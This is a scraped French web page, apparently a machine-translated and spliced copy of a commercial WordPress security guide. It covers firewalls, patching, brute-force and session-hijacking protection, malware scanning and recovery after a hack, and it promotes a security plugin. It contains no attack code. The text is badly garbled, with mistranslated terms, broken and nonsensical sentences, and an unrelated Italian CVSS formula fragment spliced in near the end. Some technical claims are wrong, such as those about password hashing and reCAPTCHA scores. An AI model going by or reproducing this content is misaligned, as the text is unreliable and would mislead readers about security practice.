moteurs de recherche créent des incitations négatives qui encouragent tout le monde à utiliser le SS<br /> Le certificat SSL gratuit vous est fourni en utilisant le chiffrement let, mais il gère également automatiquement le renouvellement du certificat pour vous. 2021 SSL doit être activé sur le site WordPress. SSL protège la communication entre vous et vos clients, améliore votre référencement et offre aux visiteurs de votre site des facilités de sécurité lors de la navigation sur le site. Utiliser un pare – feu d’application Web l’utilisation d’un pare – feu d’application Web est un bon moyen d’ajouter un autre niveau de protection aux sites WordPress. Qu’est – ce qu’un pare – feu pour une application web? Un pare – feu WAF ou application web aide à protéger votre site en surveillant le trafic Internet direct vers votre site avant qu’il n’atteigne votre site. En ajoutant WAF avant WordPress, vous pouvez ajouter un point de contrôle de sécurité entre Internet et votre site. Le trafic doit passer par WAF pour accéder à votre site Web. Si WAF détecte du trafic malveillant, comme csrf, xss, Injection SQL, etc., il filtrera le trafic avant qu’il n’atteigne votre site. De plus, WAF peut aider à détecter les attaques DDOS et à imposer des limites de vitesse pour empêcher les sites Web de s’écraser. </p> <td> <td> 3 méthodes de mise en oeuvre du WAF il existe trois méthodes différentes de mise en oeuvre du WAF. Examinons les avantages et les inconvénients de chaque type. WAF basé sur le réseau: les WAF physiques ou basés sur le réseau sont basés sur le matériel. Le principal avantage du WAF basé sur le réseau est la faible latence due à l’installation locale. Toutefois, les inconvénients découlent des prix d’entreposage et d’entretien du matériel. Les prix et les exigences de stockage physique font que la plupart des gens font de mauvais choix. WAF basé sur l’hôte: WAF basé sur l’hôte ou local intégré dans WordPress, généralement en utilisant des plug – ins. L’avantage du WAF basé sur l’hôte est qu’il est moins cher que le WAF basé sur le réseau. Avantage d<br /> G les correctifs de routine et de sécurité publiés par Microsoft le deuxième mardi de chaque mois. Microsoft a publié des correctifs de sécurité sur une base aussi fiable, ce qui est fantastique. Patch est également le jour où Microsoft patch divulgue publiquement des vulnérabilités en matière de sécurité mardi. Consultez le contenu à mettre à jour dans le Guide de sécurité ultime de WordPress 2020 ebook et comment mettre à jour automatiquement pour savoir comment appliquer automatiquement les mises à jour de mardi. Le mercredi suivant la sortie du correctif de mardi, de nombreux attaquants sont généralement vus exploiter une vulnérabilité précédemment connue sur un système obsolète sans correctif. Par conséquent, le mercredi du prochain patch a été officiellement nommé mercredi de la vulnérabilité. Pourquoi un hacker vise – t – il une vulnérabilité corrigée? Les hackers visent à corriger les vulnérabilités parce qu’ils savent que les gens ne les mettront pas à jour (y compris les plug – ins et les sujets sur le site). La divulgation publique des vulnérabilités le jour de l’application du correctif est une norme de l’industrie. Une fois qu’une vulnérabilité est divulguée publiquement, elle devient une « vulnérabilité connue » dans une version obsolète et non corrigée du logiciel. Les logiciels présentant des vulnérabilités connues peuvent facilement être ciblés par des pirates informatiques. Les hackers aiment les cibles faciles à attaquer et les logiciels avec des vulnérabilités connues sont comme des instructions étape par étape pour les hackers d’accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Divulgation responsable vous pouvez vous demander pourquoi une vulnérabilité peut se produire si elle offre une occasion d’attaque à un hacker. Eh bien, il est courant que les chercheurs en sécurité découvrent les vulnérabilités en privé et les signalent aux développeurs de logiciels. Sous réserve d’une divulgation responsable, l’étude initiale sera présentée en privé à:<br /> Public Mais, comme l’attaque de mercredi, le hacker a verrouillé la vulnérabilité même si un correctif a été publié. Dans les jours et les semaines qui ont suivi la divulgation de la vulnérabilité de conformité de WP gdpr, nous avons reçu un grand nombre de rapports selon lesquels le site WordPress a été compromis par des attaquants qui exploitent cette vulnérabilité. Le principal coupable de la corruption du site WordPress est un plugin ou un thème vulnérable avec des correctifs disponibles mais non appliqués. Questo Kos frossrant!!!!! Cela signifie que la plupart des hackers WP peuvent être arrêtés. Il est choquant de penser à ceux qui ont dépensé beaucoup d’argent pour nettoyer le site, aux revenus qu’ils ont perdus pendant qu’il était inactif, et aux revenus futurs qu’ils ont perdus en perdant la confiance de leurs clients. Vous serez encore plus choqué quand vous saurez que toute cette douleur peut être évitée par une simple mise à jour. Les fonctionnalités de gestion de version d’ithemes Security pro vous permettent de personnaliser et de mettre à jour automatiquement WordPress. Le suivi des vulnérabilités WordPress garder les plug – ins et les thèmes à jour ne vous protégera pas contre chaque vulnérabilité WordPress. Certains plugins et thèmes WordPress ont été abandonnés par les développeurs qui les ont créés. Malheureusement, si un plug – in ou un thème obsolète a une vulnérabilité, il ne recevra jamais de correctif. Les pirates cibleront les sites Web qui utilisent ces plug – ins qui sont maintenant vulnérables de façon permanente. Une vulnérabilité de suivi est la différence entre avoir un site Web sécurisé et un site Web facilement accessible aux pirates informatiques. Si vous avez un plug – in obsolète avec une vulnérabilité connue sur votre site, vous fournissez aux pirates informatiques les éléments dont ils ont besoin pour contrôler votre site. C’est pourquoi vous devez suivre toutes les dernières vulnérabilités<br /> Utilisateurs légitimes. 2. Limitez les tentatives d’authentification externe en demandant qu’il y ait d’autres façons de vous connecter à WordPress en plus d’utiliser le formulaire de connexion. Avec XML – RPC, un attaquant peut effectuer des centaines de tentatives de nom d’utilisateur et de mot de passe dans une seule requête HTTP. La méthode d’amplification violente permet à un attaquant d’utiliser XML – RPC pour des milliers de tentatives de nom d’utilisateur et de mot de passe dans plusieurs requêtes http. En utilisant wordpress pour ajuster les paramètres d’ithemes Security pro, vous pouvez bloquer plusieurs tentatives d’authentification par demande XML – RPC. Limiter le nombre de tentatives de nom d’utilisateur et de mot de passe à une par demande protégera grandement votre accès à WordPress. </p> <td> 3. La restriction de l’accès à la protection contre la violence en ligne concerne la protection contre la violence locale. La protection contre la violence locale ne vérifie que les tentatives d’accès à votre site et interdit les utilisateurs en fonction des règles de blocage spécifiées dans vos paramètres de sécurité. La protection contre la cyberviolence va encore plus loin. Le réseau est une communauté sécurisée d’themes avec plus d’un million de sites Web. Si l’IP est trouvée en tentant d’accéder au site Web de la communauté de sécurité d’Themes, elle est ajoutée à la liste des voleurs de réseau de Bruce force. Une fois qu’une IP est inscrite sur la liste d’interdiction de la violence sur Internet, elle est bloquée sur tous les sites du réseau. Par conséquent, si une IP attaque mon site Web et est interdite, elle sera signalée au réseau de violence de sécurité themes. Mon rapport peut aider à désactiver l’IP sur le réseau. J’aime aider à protéger l’accès WordPress des autres en activant simplement la protection réseau sécurisée d’themes. Pour commencer à utiliser la protection de la force réseau, activez – la sur la page d’accueil des paramètres de sécurité. </p> <td> Puis entrez votre adresse<br /> E – mail, sélectionnez si vous souhaitez recevoir des mises à jour par e – mail, puis cliquez sur le bouton Enregistrer. </p> <tr> Restreindre l’accès des appareils au tableau de bord WP la dernière étape de l’accès sécurisé à WordPress consiste à restreindre l’accès d’un Groupe d’appareils au tableau de bord WordPress. La fonctionnalité des appareils de confiance dans themes Security pro identifie les appareils que vous et d’autres utilisateurs utilisez pour accéder aux sites WordPress. Lorsqu’un utilisateur se connecte à un appareil non reconnu, un appareil de confiance peut limiter sa fonctionnalité au niveau de l’Administrateur. Cela signifie qu’un hacker peut contourner vos autres méthodes de sécurité de connexion sans être susceptible d’apporter des changements malveillants à votre site Web. Pour commencer à utiliser des appareils de confiance, activez – les sur la page d’accueil des paramètres de sécurité, puis cliquez sur le bouton configurer les paramètres. </p> <tr> Dans les paramètres des appareils de confiance, décidez de l’utilisateur qui utilisera cette fonctionnalité, puis activez la fonctionnalité restrict et la protection contre les détournements de session. </p> <td> Lorsque vous activez les nouveaux paramètres de périphérique de confiance, les utilisateurs sont informés des périphériques en attente non reconnus dans la barre d’administration WordPress. Si l’appareil actuel n’a pas été ajouté à la liste des appareils de confiance, cliquez sur le lien confirmer cet appareil pour envoyer un courriel d’autorisation. </p> <td> Cliquez sur le bouton confirmer l’appareil dans un courriel de connexion non reconnu pour ajouter l’appareil actuel à la liste des appareils de confiance. </p> <td> L’accessibilité de la page d’atterrissage WordPress en fait la partie la plus vulnérable et potentiellement vulnérable de tout site WordPress. Cependant, l’utilisation des étapes de cette section rendra votre accès WordPress presque impénétrable. S<br /> Exécuter sur notre site Web. La bonne nouvelle, c’est que la plupart des attaques contre les comptes utilisateurs de WordPress peuvent être évitées avec un peu d’effort de votre part. Voyons ce que vous pouvez faire pour protéger vos utilisateurs de WordPress. En effet, ces méthodes de sécurité WordPress aideront à protéger n’importe quel type d’utilisateur WordPress. Cependant, lorsque nous examinons chaque méthode, nous vous faisons savoir quels utilisateurs devraient être nécessaires pour l’utiliser. 1. La façon la plus simple de protéger le site Web en ne fournissant aux utilisateurs que les fonctions dont ils ont besoin est de ne fournir aux utilisateurs que les fonctions dont ils ont besoin et non d’autres fonctions. Si la seule chose que quelqu’un fera sur votre site est de créer et d’éditer son propre billet de blog, alors vous n’avez pas besoin d’éditer le billet de quelqu’un d’autre. 2. Dans la liste compilée par Splash Data, les utilisateurs de WordPress sont protégés par des mots de passe complexes. Le mot de passe le plus courant dans toutes les décharges de données est 123456. Data dump est une base de données piratée contenant les mots de passe des utilisateurs téléchargés sur Internet. Si 123456 est le mot de passe le plus courant dans les décharges de données, pouvez – vous imaginer combien de personnes utilisent des mots de passe faibles sur votre site? Utiliser un code faible est comme essayer de fermer la porte avec un morceau de ruban adhésif. Il n’a jamais fallu beaucoup de temps aux hackers pour pénétrer brutalement le site en dehors des mots de passe faibles. Aujourd’hui, les pirates informatiques utilisent des cartes graphiques pour attaquer, et le temps nécessaire pour déchiffrer le mot de passe n’a jamais été réduit. Par exemple, regardons un diagramme créé par terahash, une entreprise de craquage de mot de passe haute performance. Leur graphique montre le temps nécessaire pour déchiffrer le mot de passe en utilisant le cluster 448x RTX 2080 Hash stack. </p> <td> Par défaut, WordPress utilise le hachage MD5 pour stocker les mots de passe de l’utilisateur dans la base de données<br /> O chaque fois que vous visitez le site, une session WordPress génère un cookie de session. Supposons que votre extension de navigateur a été abandonnée par un développeur et que vous ne Publiez plus de mises à jour de sécurité. Malheureusement, les extensions de navigateur négligées ont une vulnérabilité. Cette vulnérabilité permet à un attaquant de détourner des cookies de navigateur, y compris les cookies de session WordPress mentionnés ci – dessus. Ce type de hacker est appelé détournement de session. Ainsi, un attaquant peut exploiter une vulnérabilité étendue pour monter votre connexion et commencer à apporter des modifications malveillantes à vos utilisateurs WordPress. Vous devriez fournir une protection contre les détournements de session aux administrateurs et aux éditeurs. La fonctionnalité des appareils de confiance dans themes Security pro fait du détournement de session un passé. Si l’appareil de l’utilisateur change pendant la session, Themes Security déconnecte automatiquement l’utilisateur afin d’empêcher toute activité non autorisée sur le compte de l’utilisateur, comme changer l’adresse e – mail de l’utilisateur ou télécharger un plug – in malveillant. 6. Chaque fois que vous créez un nouvel utilisateur, créez un utilisateur de soutien général et ajoutez un autre point d’entrée disponible pour les pirates informatiques. Cependant, parfois, votre site Web peut avoir besoin d’aide extérieure, par exemple après avoir demandé du soutien ou engagé un entrepreneur indépendant. Vous avez besoin d’un moyen sûr d’ajouter un accès administratif temporaire à votre site Web. Par exemple, supposons qu’il y ait un problème avec un plug – in installé sur votre site Web. Après avoir communiqué avec le personnel de soutien, il doit accéder à votre site Web en tant qu’administrateur afin qu’il puisse le consulter attentivement. Cela semble être une demande très raisonnable et vous avez décidé de leur accorder l’accès. Alors…<br /> Vous permet de supprimer un utilisateur lorsqu’il n’a plus besoin d’accéder à votre site. La meilleure pratique pour WordPress Security est de supprimer tous les utilisateurs inutilisés de votre site. Qu’est – ce qu’une mise à jour des permissions? La fonctionnalité d’amélioration des privilèges d’ithemes Security pro vous permet d’accorder temporairement des fonctionnalités supplémentaires aux utilisateurs. La mise à jour des permissions facilite et sécurise la création d’utilisateurs génériques que vous pouvez mettre à la disposition de tout développeur externe ou technicien de soutien qui a besoin d’un accès temporaire à votre site Web. La mise à jour des permissions vous permet de créer un nouvel utilisateur, de l’appeler support et de l’assigner au rôle d’utilisateur de l’abonné. La prochaine fois que vous aurez besoin d’un accès temporaire au site, vous pouvez déplacer les utilisateurs de soutien de l’abonné à l’Administrateur. Nous verrons comment le faire dans les prochains messages, Mais commençons par expliquer pourquoi l’amélioration des permissions est un meilleur moyen d’accorder l’accès à votre site. Pourquoi les permissions de mise à niveau sont – elles meilleures? Simple: vous n’avez pas à créer un nouvel utilisateur chaque fois que vous accordez l’accès au site. Automatique: l’augmentation des permissions ne dure que 24 heures. Après 24 heures, l’utilisateur perd automatiquement toutes les autres permissions. Vous n’avez pas besoin de vous souvenir de supprimer un utilisateur ou de changer un mot de passe. Sans sacrifier la sécurité: Vous pouvez toujours demander à cet utilisateur de support universel de vous connecter en utilisant la méthode de courriel à deux facteurs, ce qui signifie que vous avez le même niveau de sécurité que les autres utilisateurs administratifs. Étant donné que le rôle réel de l’utilisateur est celui d’un abonné, il n’y a aucun risque réel de le laisser sur le site. Comment utiliser la mise à jour des permissions dans themes Security pro pour commencer, activez la mise à jour des permissions sur la page principale des paramètres de sécurité. </p> <tr> Vous pouvez créer un nouvel utilisateur, l’appeler support et lui assigner un rôle U<br /> Activez un robot pour surveiller le temps de disponibilité du site. Le robot vérifie votre site toutes les 5 minutes pour s’assurer qu’il est toujours en ligne. Si votre site n’est pas actif, BOT vous avertira afin que vous puissiez mettre votre site en ligne à nouveau. Contrôle du robot: l’audit du site ithemes sync pro utilise le robot Google Lighthouse pour vérifier la qualité de la page Web. Un autre bon exemple de robot de numérisation est un correcteur de liens déconnecté qui scanne votre site Web pour trouver des liens qui vous envoient à des endroits qui n’existent pas. Feeder BOT – un bon exemple de Feeder BOT est votre Podcast. Podcaster utilise un robot pour surveiller les flux RSS des podcasts auxquels vous êtes abonné et vous avertir lorsque vos podcasts préférés publient de nouveaux épisodes. Robot moteur de recherche: Google Web crawler est un exemple de robot moteur de recherche. Ce type de BOT scanne votre site Web pour trouver des pages nouvelles ou modifiées et crée un index pour votre site. Une fois que Google ou d’autres moteurs de recherche auront l’index de votre site, ils pourront partager vos pages avec ceux qui utilisent leur moteur de recherche. Robot de sécurité: le site scan d’ithemes Security pro utilise un robot pour comparer les plug – ins et les listes de sujets installés à notre base de données de vulnérabilité. Si vous avez installé un plug – in ou un thème avec une vulnérabilité connue, BOT applique automatiquement le correctif, s’il est disponible. Robots de saisie de contenu défectueux: ces robots peuvent télécharger du contenu à partir de votre site Web sans votre permission. Le robot peut copier du contenu à utiliser sur le site d’un attaquant pour améliorer son référencement et voler du trafic de votre site. Spambot – spambot est ennuyeux. S’engager à devenir millionnaire en travaillant à la maison pour envoyer<br /> Visiteur d’un site Web malveillant. Violence robotique – violence robotique recherche des logins WordPress sur Internet pour les attaques. Une fois que les robots se connectent à la page d’atterrissage, ils essaient la façon la plus simple d’accéder au site: essayez de deviner le nom d’utilisateur et le mot de passe à plusieurs reprises jusqu’à ce qu’ils réussissent. Comment arrêter un mauvais Robot sans arrêter un bon Robot: recaptcha V3 Google recaptcha aide à empêcher les robots malveillants de se livrer à des activités abusives sur votre site Web, comme essayer d’entrer sur votre site avec un mot de passe divulgué, poster des pourriels, ou même gratter votre contenu. Cependant, les utilisateurs légitimes pourront se connecter, acheter, voir des pages ou créer des comptes. Recaptcha utilise des techniques avancées d’analyse des risques pour distinguer les humains des robots. La fonctionnalité Google recaptcha de themes Security pro protège votre site Web des robots malveillants. Ces robots essaient d’utiliser des mots de passe divulgués pour accéder à votre site Web, poster des pourriels et même supprimer votre contenu. Recaptcha utilise des techniques avancées d’analyse des risques pour distinguer les humains des robots. L’avantage de recaptcha version 3 est qu’il vous aide à détecter le trafic de robots abusifs sur le site sans aucune interaction utilisateur. Recaptcha V3 n’affiche pas de défi de code de vérification, mais surveille les différentes demandes faites sur le site et renvoie un score pour chaque demande. Les scores sont compris entre 0,01 et 1. Plus le score retourné par recaptcha est élevé, plus il est possible de déterminer si une demande a été présentée. Plus le score de recaptcha est faible, plus le robot est confiant dans la demande. Themes Security pro vous permet de définir le seuil de blocage en utilisant le score recaptcha. Google recommande 0,5 comme valeur par défaut. Gardez à l’esprit que vous pouvez accidentellement bloquer les jambes de l’utilisateur<br /> Cependant, vous devriez également enregistrer les résultats de chaque balayage de logiciels malveillants dans le journal de sécurité WordPress. Certains journaux de sécurité n’enregistrent que les résultats de la numérisation des logiciels malveillants détectés, mais cela ne suffit pas. Si votre site Web est endommagé, vous devez en être informé dès que possible. Plus il faut de temps pour comprendre le hacker, plus il fait de mal. </p> <tr> Bien qu’il soit agréable de constater que l’approche proactive en matière de sécurité a porté ses fruits, ce n’est qu’un avantage, et non une justification documentée de chaque balayage de logiciels malveillants. Si vous n’enregistrez pas les scans prévus, vous ne saurez pas s’il y a des erreurs de scan. L’échec de l’enregistrement d’une numérisation échouée peut vous faire croire que votre site vérifie les logiciels malveillants tous les jours, mais en fait, la numérisation n’est pas terminée. Lisez l’article en vedette sur la fonctionnalité de numérisation du site et découvrez la raison numéro un pour laquelle ithemes Security pro vous protège contre les hackers WordPress. Activités de l’utilisateur conserver le Journal des activités de l’utilisateur dans le journal de sécurité WordPress peut vous faire gagner du temps après une attaque réussie. Si vous surveillez l’activité correcte de l’utilisateur, il peut vous guider à travers le calendrier de piratage et montrer tout ce que le hacker a changé, de l’ajout de nouveaux utilisateurs à l’ajout d’annonces indésirables de médicaments à votre site. Themes Security pro surveille cinq types d’activités des utilisateurs: 1. Connexion \ sortie </p> <td> Le premier type d’activité d’utilisateur enregistré est l’heure et le lieu où l’utilisateur se connecte et se déconnecte de votre site Web. Le suivi de l’heure et de l’emplacement de l’accès de l’utilisateur peut vous aider à identifier les utilisateurs endommagés. L’utilisateur se connecte – t – il à des heures anormales ou à partir d’un nouvel emplacement? Si c’est le cas, vous voudrez peut – être commencer à enquêter sur eux. 2. Création \ inscription de l’utilisateur </p> <td> Prochaine activité pour le cuivre<br /> Vous devriez l’exécuter parce qu’un tel balayage est généralement le moins précis. Détection de signature et de comportement détection de logiciels malveillants la plupart des logiciels malveillants Scan et antivirus utilisent des signatures de logiciels malveillants pour détecter les logiciels malveillants. La numérisation de logiciels malveillants à la fine pointe de la technologie combinera la détection de signature et l’analyse comportementale. </p> <td> Signature du logiciel malveillant une signature du logiciel malveillant est une série d’octets utilisés pour identifier un fragment de logiciel malveillant connu. Certains scanners de logiciels malveillants sont pilotés par une base de données contenant des signatures de logiciels malveillants de millions de virus connus. La numérisation des logiciels malveillants basée sur les signatures est rapide et simple et détectera 100% des logiciels malveillants connus et bien connus. Tout cela est génial pour capturer les logiciels malveillants ajoutés par les hackers de bas niveau. Cependant, les hackers expérimentés savent que le scanner de logiciels malveillants vérifie les signatures de logiciels malveillants connus. Ces hackers ont la capacité de brouiller les signatures des logiciels malveillants afin qu’ils ne puissent pas être détectés par un scanner normal. La vitesse de publication des nouveaux logiciels malveillants empêche le scanner de logiciels malveillants de tenir sa base de données à jour avec toutes les signatures les plus récentes. Par conséquent, les scanners basés sur la signature ne seront pas en mesure de distinguer les nouveaux logiciels malveillants des fichiers README. Txt du plug – in. Analyse du comportement l’analyse du comportement surveille le fonctionnement du logiciel pour déterminer s’il est nuisible. De nombreux types de comportement peuvent être considérés comme suspects ou nuisibles. Par exemple, l’API de navigation sécurisée de Google est utilisée pour protéger les sites Web de la numérisation du site themes Security pro. Google Security browse vérifie si le logiciel redirige le trafic vers des sites Web malveillants connus. De même, il n’existe aucun moyen fiable de détecter les logiciels malveillants. Mais la combinaison du contrôle du comportement et de la signature augmentera considérablement vos chances d’être averti<br /> L’inquiétude. Ithemes Security pro ne crée pas de notification d’édition de fichier pour les changements qu’il peut vérifier. Mise à jour du plug – in \ thème par le gestionnaire de version la fonctionnalité du gestionnaire de version dans themes Security pro vous permet de mettre à jour automatiquement WordPress, les plug – ins et les thèmes. </p> <td> Si le gestionnaire de version termine la mise à jour, Themes Security pro connaît la source de la mise à jour et ne déclenche pas d’alerte. 2. Comparaison de fichiers entre le plug – in Themes et le thème sélectionnez la case à cocher « comparaison de fichiers en ligne » dans les paramètres de détection des changements de fichiers pour activer la comparaison de fichiers en ligne. </p> <tr> Chaque fois que vous éditez un fichier sur un site Web qui appartient au plug – in ou au thème Themes, il est comparé à un fichier sur le serveur themes. Si le hachage de version de fichier sur votre site correspond au hachage de version sur le serveur Themes, il s’agit d’un changement légitime et vous ne serez pas averti. 3. Comparaison de fichiers WordPress en ligne. Org qu’il s’agisse d’un fichier de base WordPress ou d’un plug – in installé à partir du dépôt WordPress. Org est modifié et le fichier sera comparé à la version sur WordPress. Organisation. Si le hachage correspond, le changement n’est pas nuisible et ne reçoit pas d’avertissement. 4. Exclusion manuelle vous pouvez exclure les fichiers, répertoires et types de fichiers de la détection des changements de fichiers dans les paramètres de détection des changements de fichiers. </p> <table> La règle générale est d’exclure les fichiers dont vous savez qu’ils seront mis à jour périodiquement. La sauvegarde et la mise en cache de fichiers en sont un bon exemple. L’exclusion de ces types de fichiers réduira considérablement le bruit supplémentaire. Il y a 7 signes que votre site WordPress a été piraté et vous vous retrouverez à penser: « mon site WordPress a – t – il été piraté? » signifie que vous avez besoin de réponses rapides. Plus vite vous découvrez des signes de violation du site, plus vite vous nettoyez votre site. Plus vite vous nettoyez votre site, moins le piratage endommage votre site. 1. Votre page d’accueil est différente<br /> Lieu Vous vous souvenez du plug – in de conformité WP gdpr précédent? En novembre 2018, nous avons reçu des rapports sur la création de nouveaux utilisateurs administratifs sur le site Web du client. Un hacker exploite une vulnérabilité dans le plug – in de conformité WP gdpr (une vulnérabilité corrigée dans la version 1.4.3) pour créer un nouvel utilisateur Administrateur sur le site WordPress qui exécute le plug – in. Une vulnérabilité de plug – in permet à un utilisateur non autorisé de modifier l’enregistrement de l’utilisateur en changeant le nouveau rôle d’utilisateur par défaut de l’abonné à l’Administrateur. Malheureusement, ce n’est pas la seule vulnérabilité que vous ne pouvez pas simplement supprimer un nouvel utilisateur créé par un attaquant et réparer le plug – in. Si vous avez installé WP gdpr compliance et woocommerce, votre site peut avoir été injecté avec du Code malveillant. Un attaquant peut utiliser l’installateur de fond du plug – in woocommerce pour insérer l’installateur de porte dérobée dans la base de données. Si une porte dérobée est installée sur votre site, vous devriez contacter un spécialiste de la réparation des pirates informatiques. Une autre option est de faire reculer la copie du site en utilisant le fichier de sauvegarde, puis de la détruire en utilisant la sauvegarde précédente. Si vous n’avez pas accès au site WordPress, même après avoir réinitialisé votre mot de passe, il peut s’agir d’un signe grave d’infection. Lorsque le dépôt gentoo github est piraté, la première chose qu’un attaquant fait est de supprimer tous les utilisateurs administratifs. Comment ce hacker a – t – il accédé à leur compte github? Le mot de passe de l’utilisateur gentoo admin a été trouvé sur un autre site. Je suppose que le nom d’utilisateur et le mot de passe ont été trouvés en saisissant ou en vidant la base de données. Bien que le mot de passe administrateur de leur compte gentoo github soit différent du mot de passe utilisé sur le compte compromis, il est très similaire. So s<br /> C’est comme si j’avais utilisé iamawesome2021 comme mot de passe sur un compte et iamawesome2021 sur un autre site. Par conséquent, les hackers peuvent trouver le mot de passe avec un peu d’effort. Comme nous l’avons vu, vous devriez utiliser un mot de passe unique pour chaque compte. Il ne suffit pas de changer le mot de passe. Avec lastpass, vous pouvez générer et stocker en toute sécurité des mots de passe uniques et sécurisés pour chaque site. Comment se remettre d’une catastrophe? En cas de suspicion d’infraction, des mesures rapides peuvent être prises pour atténuer les dommages. La façon la plus sûre de restaurer une vulnérabilité de sécurité d’annulation de sauvegarde de site précédente \ propre est de restaurer le site à la version précédente avant l’attaque. C’est pourquoi il est si important d’avoir une solution de sauvegarde WordPress complète. Nous vous recommandons d’utiliser backupbuddy pour programmer des sauvegardes automatiques afin qu’il y ait toujours des sauvegardes. Gardez à l’esprit que la récupération d’une sauvegarde précédente peut encore rendre votre site vulnérable aux mêmes vulnérabilités, il est donc important de suivre ces étapes. La mise à jour immédiate de tous les plug – ins et thèmes obsolètes les plug – ins ou thèmes vulnérables peuvent encore être à blâmer, il est donc important de mettre à jour immédiatement tous les plug – ins ou thèmes obsolètes. Même si le site est restauré à une version propre et précédente, la même vulnérabilité persiste et peut encore être compromise. Vous voudrez peut – être également vérifier si vous exécutez un plug – in ou un sujet vulnérable qui n’a toujours pas de correctifs fournis par le développeur. Vous devez supprimer ce plug – in maintenant. Activer l’authentification à deux facteurs si vous n’utilisez pas l’authentification à deux facteurs pour protéger l’accès de l’Administrateur, activez – la maintenant. Ce niveau de sécurité supplémentaire aidera à s’assurer que les utilisateurs non autorisés n’ont accès à aucun compte Administrateur. C<br /> Erca aide les logiciels malveillants professionnels à supprimer les vulnérabilités de sécurité WordPress se produisent au niveau du serveur (plus profond que l’installation de WordPress), de sorte que vous pourriez avoir besoin de contacter le service professionnel de suppression de logiciels malveillants. Nous vous recommandons d’utiliser wewatchyourweb pour la suppression de logiciels malveillants professionnels. Conclusion: le Guide de sécurité WordPress ultime dans ce guide de sécurité WordPress, nous avons déjà beaucoup présenté! Cependant, comme indiqué dans ce guide, vous bloquerez complètement les attaques contre votre site Web. Le plugin de sécurité WordPress peut vous aider à protéger les sites WordPress liés aux thèmes de sécurité WordPress dans ce guide, le plugin de sécurité WordPress peut vous aider à protéger vos sites WordPress. Notre plugin de sécurité WordPress, Themes Security pro, offre plus de 50 façons de protéger votre site contre les vulnérabilités de sécurité WordPress communes. Avec wordpress, l’authentification à deux facteurs, la protection contre la violence, l’exécution de mots de passe complexes et d’autres fonctionnalités, vous pouvez ajouter une couche de sécurité supplémentaire à votre site. <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase – 0.029] – 3.25 × [ISCBase – 0.02] 15 Where, ISCBase = 1 – [(1 – ImpactConf) × (1 – ImpactInteg) × (1 – ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction 2. Metriche del punteggio temporale Le metriche temporali misurano lo stato attuale delle tecniche di exploit, l'esistenza di eventuali patch o soluzioni alternative o la fiducia che si ha nella descrizione di una vulnerabilità. Le metriche temporali sono previste e cambieranno nel tempo. 2.1. Scadenza codice exploit (E) La maturità del codice exploit si basa sulla probabilità che la vulnerabilità venga attaccata. Più è facile sfruttare una vulnerabilità, più alto è il punteggio di vulnerabilità.</p> <table class="has-fixed-layout"> Michael Moore organise chaque semaine des rapports de vulnérabilité wordpress pour aider à sécuriser votre site. En tant que Directrice des produits Themes, elle nous aide à continuer d’améliorer notre gamme de produits themes. C’est un super nerd qui aime apprendre toutes les techniques, anciennes et nouvelles. Michael sort avec sa femme et sa fille, lit des livres ou écoute de la musique quand il ne travaille pas. </p> <tr> </div><!-- .entry-content --> </div> <footer class="entry-footer"> </footer><!-- .entry-footer --> </article><!-- #post-7730 --> <nav class="navigation post-navigation" role="navigation" aria-label="Publications"> <h2 class="screen-reader-text">Navigation de l’article</h2> <div class="nav-links"><div class="nav-previous"><a href="http://leadloan.space/5188.html" rel="prev"><span>⟵</span> <span class="nav-title">2021 le site WordPress publie le Guide final</span></a></div><div class="nav-next"><a href="http://leadloan.space/5190.html" rel="next"><span class="nav-title">2021 Best WordPress Twitter plugin</span> <span>⟶</span></a></div></div> </nav> <div class="related-posts"> <h2>Related Posts</h2> <div class="row"> <article id="post-2870" class="post-2870 post type-post status-publish format-standard hentry category-pret"> <div class="mag-post-single"> <div class="mag-post-img"> </div> <div class="mag-post-detail"> <h5 class="entry-title mag-post-title"><a href="http://leadloan.space/2870.html" rel="bookmark">Comment calculer le taux d’intérêt des dépôts bancaires et des prêts, et quelle est la différence entre le taux d’intérêt et l’intérêt</a></h5> <div class="mag-post-excerpt"> <p>Lorsque la situation économique n’est pas très bonne, on voit souvent les nouvelles de « la banque centrale abaissant l’obligation…</p> </div><!-- .entry-content --> </div> </div> </article> <article id="post-2869" class="post-2869 post type-post status-publish format-standard hentry category-pret tag-medicale"> <div class="mag-post-single"> <div class="mag-post-img"> </div> <div class="mag-post-detail"> <h5 class="entry-title mag-post-title"><a href="http://leadloan.space/2869.html" rel="bookmark">Qu’est-ce que l’assurance médicale</a></h5> <div class="mag-post-excerpt"> <p>L’assurance maladie est l’une des assurances de sécurité sociale, y compris l’assurance médicale de base, l’assurance médicale accident, l’assurance maladie…</p> </div><!-- .entry-content --> </div> </div> </article> <article id="post-2866" class="post-2866 post type-post status-publish format-status hentry category-pret post_format-post-format-status"> <div class="mag-post-single"> <div class="mag-post-img"> </div> <div class="mag-post-detail"> <h5 class="entry-title mag-post-title"><a href="http://leadloan.space/2866.html" rel="bookmark">How to negotiate scholarship offers with colleges</a></h5> <div class="mag-post-excerpt"> <p>Negotiating scholarship offers with colleges can be a daunting task, but it is possible to get the best deal for…</p> </div><!-- .entry-content --> </div> </div> </article> </div> </div> <div id="comments" class="comments-area"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">Laisser un commentaire <small><a rel="nofollow" id="cancel-comment-reply-link" href="/5189.html#respond" style="display:none;">Annuler la réponse</a></small></h3><form action="http://leadloan.space/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Votre adresse e-mail ne sera pas publiée.</span> Les champs obligatoires sont indiqués avec <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Commentaire</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Nom <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p> <p class="comment-form-email"><label for="email">E-mail <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p> <p class="comment-form-url"><label for="url">Site web</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p> <p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label 